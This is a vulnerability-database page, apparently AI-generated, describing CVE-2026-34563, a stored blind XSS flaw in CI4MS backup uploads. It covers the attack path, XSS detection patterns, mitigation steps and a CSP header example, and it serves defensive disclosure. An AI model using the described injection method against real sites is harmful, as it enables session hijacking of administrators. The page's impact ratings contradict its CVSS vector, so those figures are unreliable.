The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-34563

CVE-2026-34563: CI4MS CMS Stored XSS Vulnerability

CVE-2026-34563 is a stored blind XSS flaw in CI4MS, a CodeIgniter 4-based CMS, allowing attackers to inject malicious scripts via backup uploads. This article covers technical details, affected versions, and mitigation.

Published: April 2, 2026

CVE-2026-34563 Overview

CVE-2026-34563 is a critical stored cross-site scripting (XSS) vulnerability affecting CI4MS, a CodeIgniter 4-based CMS skeleton that provides a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An attacker can inject a malicious JavaScript payload into the backup filename via an uploaded SQL file, which uses SQL functionality to insert the XSS payload server-side. This stored payload is later rendered unsafely in multiple backup management views without proper output encoding, leading to stored blind cross-site scripting (Blind XSS).

Critical Impact

This stored Blind XSS vulnerability allows attackers with low privileges to inject persistent malicious scripts that execute in the context of administrative users viewing the backup management interface, potentially leading to session hijacking, privilege escalation, and unauthorized data access.

Affected Products

  • CI4MS versions prior to 0.31.0.0

Discovery Timeline

  • 2026-04-01 - CVE-2026-34563 published to NVD
  • 2026-04-02 - Last updated in NVD database

Technical Details for CVE-2026-34563

Vulnerability Analysis

This vulnerability stems from improper input validation and output encoding within the CI4MS backup management functionality. The application processes user-uploaded backup files, including SQL files that contain backup metadata such as filenames. When an attacker uploads a specially crafted SQL file containing a malicious JavaScript payload embedded in the filename field, the application stores this payload without proper sanitization. Subsequently, when administrative users access the backup management views, the unsanitized payload is rendered directly in the browser, executing the attacker's JavaScript code.

The "blind" nature of this XSS attack is particularly concerning because the attacker may not have direct visibility into when or how the payload executes. Instead, the malicious script triggers when an administrator or privileged user views the backup management interface, making it an effective attack vector for targeting high-value accounts.

Root Cause

The root cause of CVE-2026-34563 is a failure to implement proper input sanitization on user-controlled data during backup file upload processing, combined with missing output encoding when rendering backup metadata in administrative views. The application trusts filenames and metadata extracted from uploaded SQL backup files without validation, and subsequently renders this data in HTML contexts without escaping special characters. This violates secure coding practices that mandate treating all user-supplied data as untrusted and encoding output based on the rendering context.

Attack Vector

The attack is network-based and requires low privileges to execute. An attacker with the ability to upload backup files to the CI4MS application can craft a malicious SQL backup file (e.g., xss.sql) containing JavaScript payloads embedded in filename or metadata fields. When this file is processed by the application, the malicious payload is stored in the database. The stored XSS payload then executes automatically when any user with access to the backup management views loads the affected pages, without requiring any additional interaction from the victim.

The vulnerability mechanism works as follows: The attacker uploads a backup file with a crafted filename containing script tags or JavaScript event handlers. The application's SQL processing functionality extracts and stores this filename without sanitization. When the backup management interface renders the list of backups, it outputs the filename directly into HTML without proper encoding, causing the browser to interpret and execute the embedded JavaScript. For technical details, see the GitHub Security Advisory GHSA-85m8-g393-jcxf.

Detection Methods for CVE-2026-34563

Indicators of Compromise

  • Unexpected JavaScript or HTML tags present in backup file metadata or filenames stored in the database
  • Database entries containing <script>, onerror=, onload=, or other XSS payload patterns in backup-related tables
  • Unusual outbound network connections from administrative user browsers when viewing backup management pages
  • Reports of unexpected behavior or redirects when administrators access the backup management interface

Detection Strategies

  • Implement Content Security Policy (CSP) headers with strict script-src directives to block inline script execution and report violations
  • Deploy Web Application Firewall (WAF) rules to detect and block common XSS payloads in file upload requests
  • Monitor application logs for file uploads containing suspicious patterns such as <script>, javascript:, or event handler attributes
  • Conduct periodic database audits to identify stored XSS payloads in backup metadata fields

Monitoring Recommendations

  • Enable CSP violation reporting to detect attempted XSS payload execution in real-time
  • Configure SIEM alerts for HTTP responses containing unusual JavaScript patterns originating from the backup management endpoints
  • Monitor for anomalous session activity following administrator access to backup management interfaces, which may indicate session hijacking

How to Mitigate CVE-2026-34563

Immediate Actions Required

  • Upgrade CI4MS to version 0.31.0.0 or later immediately to patch this vulnerability
  • Audit existing backup records in the database for stored XSS payloads and sanitize or remove any malicious entries
  • Implement Content Security Policy headers to mitigate the impact of any undetected stored XSS payloads
  • Review access logs to identify any suspicious backup file uploads that may have exploited this vulnerability

Patch Information

The vulnerability has been patched in CI4MS version 0.31.0.0. Organizations running affected versions should upgrade immediately. The patch release is available at the GitHub Release 0.31.0.0. Detailed information about the security fix can be found in the GitHub Security Advisory GHSA-85m8-g393-jcxf.

Workarounds

  • Restrict backup upload functionality to only highly trusted administrators until the patch can be applied
  • Implement strict Content Security Policy headers with script-src 'self' to prevent inline script execution
  • Deploy a Web Application Firewall (WAF) configured to block requests containing common XSS payload patterns
  • Disable or restrict access to the backup management interface entirely until the upgrade is complete
bash
# Example Content Security Policy header configuration for Apache
# Add to .htaccess or Apache configuration
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; frame-ancestors 'none'; form-action 'self';"

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeXSS
  • Vendor/TechCi4ms
  • SeverityCRITICAL
  • CVSS Score9.1
  • EPSS Probability0.05%
  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityNone
  • AvailabilityLow
  • CWE References
  • CWE-79
  • Technical References
  • GitHub Release 0.31.0.0
  • GitHub Security Advisory GHSA-85m8-g393-jcxf
  • Related CVEs
  • CVE-2026-39392: CI4MS CodeIgniter CMS XSS Vulnerability
  • CVE-2026-39391: CI4MS CodeIgniter CMS XSS Vulnerability
  • CVE-2026-34571: CI4MS Backend Stored XSS Vulnerability
  • CVE-2026-34567: CI4MS CodeIgniter CMS XSS Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English